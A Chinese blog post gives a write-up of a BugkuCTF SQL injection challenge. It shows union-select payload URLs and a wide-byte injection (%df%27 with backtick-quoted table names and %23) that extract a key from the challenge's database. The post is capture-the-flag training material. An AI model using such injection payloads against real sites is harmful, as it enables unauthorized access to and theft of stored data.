BugkuCTF sql注入

前言

写了这么久的web题,算是把它基础部分都刷完了一遍,以下的几天将持续更新BugkuCTF WEB部分的题解,为了不影响阅读,所以每道题的题解都以单独一篇文章的形式发表,感谢大家一直以来的支持和理解,共勉~~~

点开链接一看

很明显可以看出查询key表,id=1的string字段

我们去构造payload:

http://103.238.227.13:10083/index.php?id=-1%20union%20select%201,string%20from%20%27key%27%20#

我们发现没有出来 ,诶,怎么什么都没有了 ,继续重头开始 ,看一下是什么注入

发现id=1和id=1’都没错,这时候我们想起了宽字节注入 ,试一下

果然是这个样子,有关宽字段的讲解可以参考这里

那么就好了构造payload:

http://103.238.227.13:10083/index.php?id=1%df%27 union select 1,string from 'key'#

报错,我们可以知道是引号的问题 ,那试一下另一种引号

http://103.238.227.13:10083/index.php?id=1%df%27 union select 1,string from `key`#

这种引号在tab键的上面

发现还报错 ,才想起来了可能是#的问题  把#改成%23试试看

http://103.238.227.13:10083/index.php?id=1%df%27 union select 1,string from `key`%23

直接爆出了key,这应该是我们需要的flag

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏拂晓风起

在asp.net的web应用系统中导出申请表等文档

954
来自专栏决胜机器学习

设计模式专题(十九) ——命令模式

设计模式专题(十九)——命令模式 (原创内容,转载请注明来源,谢谢) 一、概念 命令模式(Command)将一个请求封装为一个对象,从而可用不同的请求对客户进...

34015
来自专栏Seebug漏洞平台

以太坊网络架构解析

区块链的火热程度一直以直线上升,其中以区块链 2.0 —— 以太坊为代表,不断的为传统行业带来革新,同时也推动区块链技术发展。

2602
来自专栏小樱的经验随笔

BugkuCTF web基础$_GET

前言 写了这么久的web题,算是把它基础部分都刷完了一遍,以下的几天将持续更新BugkuCTF WEB部分的题解,为了不影响阅读,所以每道题的题解都以单独一篇文...

30010
来自专栏乐百川的学习频道

Python 标准库一览

Python官方教程的最后一个部分就是标准库概览,在这里我们浏览一下标准库,了解一下Python标准库包含了哪些功能。 操作系统和文件操作 os os模块包含了...

1975
来自专栏TungHsu

怎么快速将PPT转为Word文档?

想必大家都有打印PPT的经历,一般大家的方法是缩小PPT页然后打印,今天教大家一个新方法,将快速将PPT转为Word文档。

693
来自专栏葡萄城控件技术团队

如何使用WijmoJS 纯前端设计器,快速生成 Angular 应用

除了WijmoJS 的可视化在线设计器之外(在这里阅读基于Web的WijmoJS Designer),我们刚刚发布了针对Angular开发的Visual Stu...

1324
来自专栏Flutter入门

Flutter入门三部曲(1) - 基础认识

image.png 看到整体的架构图,它是由dart完成上层的framework,然后由通过skia来完成图形的绘制。

2285
来自专栏崔庆才的专栏

腾讯云上PhantomJS用法示例

爬取动态页面时,如果我们单纯去分析一个个后台的请求,手动去摸索JS渲染的到的一些结果,那简直没天理了。所以,我们需要有一些好用的工具来帮助我们像浏览器一样渲染J...

9921
来自专栏有趣的Python

12- Flask构建弹幕微电影网站-后台逻辑(四)

已上线演示地址: http://movie.mtianyan.cn 项目源码地址:https://github.com/mtianyan/movie_proj...

2526

扫码关注云+社区